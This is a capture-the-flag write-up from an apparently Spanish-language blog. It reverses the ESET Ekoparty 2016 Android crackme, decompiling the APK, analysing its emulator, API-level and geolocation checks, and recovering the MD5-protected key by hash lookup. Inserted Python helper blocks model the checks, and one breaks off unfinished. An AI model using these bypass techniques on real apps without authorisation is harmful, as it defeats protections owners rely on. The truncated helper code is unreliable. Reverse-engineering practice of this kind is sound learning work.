<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">El APK lo deje modificado para que ingrese directamente a la actividad que corresponde, tome la clave y la imprima en el logcat.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieuGO8dWA4o_Nhmbtq4aMRR3fzf6qFEN-3jhP3hqGJmErQrXlsocS6SfPY65KMsTQdpOeeHBzQVv2Hy7Rz0nnmsDaR9_uQ3y1t7ht9TJdUIOh-XhyphenhyphenkYykXwd2S_L2RYzZgVnkLL_PHogY/s1600/10.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieuGO8dWA4o_Nhmbtq4aMRR3fzf6qFEN-3jhP3hqGJmErQrXlsocS6SfPY65KMsTQdpOeeHBzQVv2Hy7Rz0nnmsDaR9_uQ3y1t7ht9TJdUIOh-XhyphenhyphenkYykXwd2S_L2RYzZgVnkLL_PHogY/s640/10.jpg" width="412" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6K_1Hbuj_Qo2Mbs5ejmKahfEc931jgfLYZRXA62W44gUICuyL1533sMivukh8ENYcMoZfn2HEPAdNdrJzZjQci9dUMovxAbfRaxSNcjjvic1KJCWujW4E7shcOmxzYUMZJ-nV1sxNOok/s1600/09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6K_1Hbuj_Qo2Mbs5ejmKahfEc931jgfLYZRXA62W44gUICuyL1533sMivukh8ENYcMoZfn2HEPAdNdrJzZjQci9dUMovxAbfRaxSNcjjvic1KJCWujW4E7shcOmxzYUMZJ-nV1sxNOok/s640/09.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Les dejo el apk original y la modificada con los archivos SMALI que toque.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://dl.dropboxusercontent.com/u/80008916/Crackmeharder.7z</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px;" /></div>
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><span style="background-color: #fefdfa; color: #333333;">Eso es todo por este 2016 @Dkavalanche </span></span><span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><br /></span><br />
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><span style="background-color: #fefdfa; color: #333333;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><span style="background-color: #fefdfa; color: #333333;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1ICO36zexR_mspqWTYnLN__WoSPiHvKUnQrnRtZCWy6l5qmqrAfFHtBHfmTtNniarh16zXKBULbQbTyLwsTy7u6zSs845jPS38uD_YnqXAkVU-7yuVpTO-6ap5TARVaCUVhhRYOLfIhE/s1600/foto_0000000720141222134251-e1419999692858.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1ICO36zexR_mspqWTYnLN__WoSPiHvKUnQrnRtZCWy6l5qmqrAfFHtBHfmTtNniarh16zXKBULbQbTyLwsTy7u6zSs845jPS38uD_YnqXAkVU-7yuVpTO-6ap5TARVaCUVhhRYOLfIhE/s200/foto_0000000720141222134251-e1419999692858.jpg" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;"><span style="background-color: #fefdfa; color: #333333;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<span style="color: #444444; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-23105696298429463302016-12-26T18:52:00.000-08:002016-12-27T04:52:17.464-08:00<b>Resolviendo el reto Nro 10 Android de ESET Ekoparty 2016 #eko12 - PARTE 1</b><br />
<b><br /></b>
<b><br /></b>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Buenas, decidí terminar el año posteando como resolver este reto Android de ESET que me pareció muy bueno.</span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Vamos a necesitar <a href="https://github.com/APK-Multi-Tool/APK-Multi-Tool">APK-Multi-tool</a>, <a href="https://sourceforge.net/p/dex2jar/wiki/Home/">dex2jar</a>, <a href="http://jd.benow.ca/">JD-GUI</a>, <a href="http://signapk.jar/">signapk.jar</a> y un emulador de Android, en mi caso use<a href="https://www.bignox.com/"> bigNOX</a> porque tengo una maquina con AMD y el emulador de Google de Windows no permite la aceleración de VM si no se posee un cpu Intel.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">El Desafio:</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">**************************************************</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">Este es el desafío de reversing en Android.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">Para encontrar el flag deberás utilizar técnicas sencillas de análisis de APK y algo de ingenio.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">Al comienzo, probablemente debas utilizar algún motor de búsqueda para dar con la contraseña correcta, que es la respuesta a una adivinanza.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">Encontrarás pistas que te guiarán en la dirección correcta.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: xx-small;">Mucha suerte y happy reversing.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<b style="font-size: small;">ROMPIENDO </b><b>CrackMeBabe.apk </b><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">SHA256:</span><span class="Apple-tab-span" style="font-size: x-small; white-space: pre;"> </span><span style="font-size: x-small;">ca80b0c050233ad6c9d70793ba76effeaffb9ede79508993f965beb04598233d</span><br />
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Cargamos el APK y ni bien lo lanzamos obtenemos la siguiente imagen de un personaje de Tv, por lo que se debe estar haciendo algún tipo de comprobación.</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo0DweFKJr5Tr4itIsHT0_npKRyK8F4YzvDSMZeArhalnjn4B8bFEQkrb1pkjhYA1R8TnMACd8QjhBe-nAAP-9UssvCkE9esnAV_nGPNVWttaoyeXUUJkXWWq1_MuKjD7zfUK7oCsikms/s1600/wrong.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo0DweFKJr5Tr4itIsHT0_npKRyK8F4YzvDSMZeArhalnjn4B8bFEQkrb1pkjhYA1R8TnMACd8QjhBe-nAAP-9UssvCkE9esnAV_nGPNVWttaoyeXUUJkXWWq1_MuKjD7zfUK7oCsikms/s400/wrong.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Decompilamos el APK con Multi-tool opción 9, con el obtendremos los archivos SMALI y el classes.dex que luego lo pasaremos por el dex2jar para obtener un .jar para abrirlo con el JD-Gui</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRtyD4mkXbeDYr4owxJkMfeetOW7HAYnwuF1jO9E2LzSPRFauK24wMJqClN1hM5NjpRLrM-dKT48_eWfPP2ns27TAc95wNWH9h2fjlePM67Zx9tKGl3gWS2UCIO5F5FORAvDxQq74eJNw/s1600/000.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRtyD4mkXbeDYr4owxJkMfeetOW7HAYnwuF1jO9E2LzSPRFauK24wMJqClN1hM5NjpRLrM-dKT48_eWfPP2ns27TAc95wNWH9h2fjlePM67Zx9tKGl3gWS2UCIO5F5FORAvDxQq74eJNw/s640/000.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">d2j-dex2jar.bat classes.dex </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">dex2jar classes.dex -> .\classes-dex2jar.jar</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">JD-Gui</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLVAxnjVX-_0m1nPaLdIWJg6ECnXGncDCEMmSAO7KfgLcGuxzynEogJZzghqml1QPOtuVb2Fy_rkAz6DzDXkROs-5NPeGpnKzQePainypgTGdTR5hDfm0o_iZnR1iulJP7kqZhbKkkovk/s1600/login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLVAxnjVX-_0m1nPaLdIWJg6ECnXGncDCEMmSAO7KfgLcGuxzynEogJZzghqml1QPOtuVb2Fy_rkAz6DzDXkROs-5NPeGpnKzQePainypgTGdTR5hDfm0o_iZnR1iulJP7kqZhbKkkovk/s640/login.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">We have several classes (</span><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Login, a, b, c, d, e, f</b>)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Let's take a bird's-eye look at the main functions that will let me get past this obstacle.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Class f</span></b></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Function <b>chk</b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">(it checks what kind of device is being used, comparing the Build fields with values taken from class <b>d</b>)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if ((!Build.MODEL.contains(d.h)) && (!Build.MODEL.contains(d.i)) && (!Build.MODEL.contains(d.m)) && (!Build.FINGERPRINT.startsWith(d.k)) && (!Build.FINGERPRINT.startsWith(d.l)) && (!Build.MANUFACTURER.contains(d.n)) && (!Build.PRODUCT.contains(d.c)) && (!Build.MODEL.contains(d.c)))</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><span style="font-family: "arial" , "helvetica" , sans-serif;">Function <b>chks</b> (boolean)</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> return Build.VERSION.SDK_INT == 22;</span><br />
<span style="font-size: x-small;"><br /></span><span style="font-family: "arial" , "helvetica" , sans-serif;">Returns true if the API level is 22 (Android Lollipop 5.0 - 5.1.1).</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">So we would have to run it on a device with that OS level, or emulate it with the corresponding AVD.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdQIBEsQlqdcMWIWdvzwun7DgsUVaIP_vGBevjkarziW_FAwuGdr-MeB6lnw8CXFHttqeqzbd4xhSH51RTJhgx6VbJQwSwBh1_9T_JWX4_7YSnBLz4LTrlfIee2LYUumEnowCtAub_ezk/s1600/avd.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdQIBEsQlqdcMWIWdvzwun7DgsUVaIP_vGBevjkarziW_FAwuGdr-MeB6lnw8CXFHttqeqzbd4xhSH51RTJhgx6VbJQwSwBh1_9T_JWX4_7YSnBLz4LTrlfIee2LYUumEnowCtAub_ezk/s320/avd.jpg" width="320" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span><br />
<table border="1" cellpadding="4" style="border-collapse: collapse; font-family: sans-serif; font-size: 14px; margin: 1em 0px;"><thead>
<tr><th>Code name</th><th>Version number</th><th>Release date</th><th>API level</th></tr>
</thead><tbody>
<tr><td>Apple Pie</td><td>1.0</td><td>23 September 2008</td><td>1</td></tr>
<tr><td>Banana Bread</td><td>1.1</td><td>9 February 2009</td><td>2</td></tr>
<tr><td><a href="https://es.wikipedia.org/wiki/Android_Cupcake">Cupcake</a></td><td>1.5</td><td>27 April 2009</td><td>3</td></tr>
<tr><td>Donut</td><td>1.6</td><td>15 September 2009</td><td>4</td></tr>
<tr><td><a href="https://es.wikipedia.org/wiki/Android_Eclair">Eclair</a></td><td>2.0–2.1</td><td>26 October 2009</td><td>5–7</td></tr>
<tr><td>Froyo</td><td>2.2–2.2.3</td><td>20 May 2010</td><td>8</td></tr>
<tr><td><a href="https://es.wikipedia.org/wiki/Android_Gingerbread">Gingerbread</a></td><td>2.3–2.3.7</td><td>6 December 2010</td><td>9–10</td></tr>
<tr><td><a href="https://es.wikipedia.org/wiki/Android_Honeycomb">Honeycomb</a></td><td>3.0–3.2.6</td><td>22 February 2011</td><td>11–13</td></tr>
<tr><td><a href="https://es.wikipedia.org/wiki/Android_Ice_Cream_Sandwich">Ice Cream Sandwich</a></td><td>4.0–4.0.4</td><td>18 October 2011</td><td>14–15</td></tr>
<tr><td><a href="https://es.wikipedia.org/wiki/Android_Jelly_Bean">Jelly Bean</a></td><td>4.1–4.3.1</td><td>9 July 2012</td><td>16–18</td></tr>
<tr><td><a href="https://es.wikipedia.org/wiki/Android_KitKat">KitKat</a></td><td>4.4–4.4.4, 4.4W–4.4W.2</td><td>31 October 2013</td><td>19–20</td></tr>
<tr><td><a href="https://es.wikipedia.org/wiki/Android_Lollipop"><b><span style="color: #cc0000;">Lollipop</span></b></a></td><td><b><span style="color: #cc0000;">5.0–5.1.1</span></b></td><td><b><span style="color: #cc0000;">12 November 2014</span></b></td><td><b><span style="color: #cc0000;">21–22</span></b></td></tr>
<tr><td><a href="https://es.wikipedia.org/wiki/Android_Marshmallow">Marshmallow</a></td><td>6.0–6.0.1</td><td>5 October 2015</td><td>23</td></tr>
<tr><td><a href="https://es.wikipedia.org/wiki/Android_Nougat">Nougat</a></td><td>7.0–7.1</td><td>22 August 2016</td><td>24–25</td></tr>
</tbody></table>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><b style="font-family: Arial, Helvetica, sans-serif;">-----------------------------------------------------------------------------------------------------</b><br />
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Class Login</b>, in which several checks are made before presenting the login frame and moving on to the second stage of the challenge, which is decrypting a resource and executing it (another APK).</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Function <b>chkn</b> (boolean) returns true if the device's geolocation has latitude 40 and longitude -74.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;">public boolean chkn()</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> int j = 0;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> int i = j;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if (this.l != null)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> i = j;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if ((int)this.l.getLatitude() == 40)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> i = j;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if ((int)this.l.getLongitude() == -73)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> i = 1;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> return i;</span></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Here we have an important check: both conditions must hold, chkn (lat: 40 and long: -73) and chks (SDK version) from class <b>f</b>, for the login frame to be shown; a hint is also printed to logcat.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">if ((<b>chkn()</b>) && (<b>f.chks()</b>))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> setContentView(2130968602);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> this.bt = ((Button)findViewById(2131492970));</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> this.tx = ((EditText)findViewById(2131492969));</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> this.vw = ((TextView)findViewById(2131492971));</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> this.vw.setOnClickListener(new c());</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> Toast.makeText(this.con, "HINT: *Escucha* lo que Gollum responde y la clave encontrarás, o encuentra el enlace ofuscado que te guiará.", 1).show();</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> Log.i(d.z, "<b>HINT: *Escucha* lo que Gollum responde y la clave encontrarás, o encuentra el enlace ofuscado que te guiará.</b>");</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> return;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> }</span></div>
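The following is an added example, not code from the post or from the challenge APK: a Python model of the two gates shown above, chkn and f.chks, using the values the decompiled code compares against. It makes explicit a detail the Java hides: the coordinates are cast to int before comparison, and a Java (int) cast truncates toward zero, so the longitude check accepts any value in (-74, -73] and the latitude check any value in [40, 41).

```python
import math

# Values taken from the decompiled code: f.chks() wants SDK_INT == 22,
# Login.chkn() wants (int) latitude == 40 and (int) longitude == -73.
REQUIRED_SDK_INT = 22
REQUIRED_LAT = 40
REQUIRED_LON = -73


def chks(sdk_int):
    """Mirror of f.chks(): only API level 22 passes."""
    return sdk_int == REQUIRED_SDK_INT


def chkn(location):
    """Mirror of Login.chkn().  `location` is None when this.l was never set
    (no fix yet), which fails the check exactly like the null test does.
    Java's (int) cast on a double truncates toward zero, so -73.97 becomes
    -73 (floor() would give -74); math.trunc reproduces that behaviour."""
    if location is None:
        return False
    lat, lon = location
    return math.trunc(lat) == REQUIRED_LAT and math.trunc(lon) == REQUIRED_LON


def login_frame_shown(sdk_int, location):
    """The gate shown above: if ((chkn()) && (f.chks())) { setContentView(...) }."""
    return chkn(location) and chks(sdk_int)


def explain(sdk_int, location):
    """Report which gate blocks the login frame, so the analyst knows whether
    the AVD's API level or its mock location is the one to adjust.
    An empty list means the login frame would be shown."""
    reasons = []
    if not chks(sdk_int):
        reasons.append("SDK_INT is %d, chks() needs %d" % (sdk_int, REQUIRED_SDK_INT))
    if location is None:
        reasons.append("no location fix yet (this.l == null)")
    elif not chkn(location):
        reasons.append("location %r truncates to (%d, %d), chkn() needs (%d, %d)"
                       % (location, math.trunc(location[0]), math.trunc(location[1]),
                          REQUIRED_LAT, REQUIRED_LON))
    return reasons


if __name__ == "__main__":
    # Constructed sample inputs (API level, (latitude, longitude)).
    for sdk, loc in [(22, (40.7128, -73.9352)), (22, (40.7128, -74.0060)),
                     (21, (40.5, -73.5)), (22, None)]:
        print(sdk, loc, explain(sdk, loc) or "login frame shown")
```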
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">We have an MD5 hash that corresponds to a key to be entered.</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> public void onClick(View paramView)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if (((paramView instanceof Button)) && (paramView == this.bt))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> try</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> {</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> paramView = this.tx.getText().toString();</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> MessageDigest localMessageDigest = MessageDigest.getInstance("MD5");</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> localMessageDigest.update(paramView.getBytes("UTF-8"));</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> paramView = String.format("%032x", new Object[] { new BigInteger(1, localMessageDigest.digest()) });</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"> if (!paramView.equalsIgnoreCase("<b>16cc45d14201e8caf26d48e636b1c48d</b>"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">We look the MD5 up on the internet and it corresponds to <b>3gg535</b>.</span></div>
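As an added example (not code from the post or the APK), here is the onClick hashing step reproduced in Python so a candidate key can be checked offline against the hash embedded in the decompiled code; it also shows why the Java code uses <code>%032x</code> on a <code>BigInteger</code> rather than a plain <code>%x</code>. The candidate list at the bottom is constructed.

```python
import hashlib

# Hash string embedded in the decompiled onClick (copied from the post).
EMBEDDED_MD5 = "16cc45d14201e8caf26d48e636b1c48d"


def java_style_md5(text):
    """Reproduce the hashing step of Login.onClick exactly:
    MessageDigest.getInstance("MD5").update(text.getBytes("UTF-8")) followed by
    String.format("%032x", new BigInteger(1, digest)).
    new BigInteger(1, bytes) reads the 16 digest bytes as an unsigned
    big-endian integer, and %032x prints it zero-padded to 32 hex digits, so
    the result equals hexdigest().  A bare %x would drop leading zero bytes
    and the comparison would then fail for keys whose digest starts with 0x00."""
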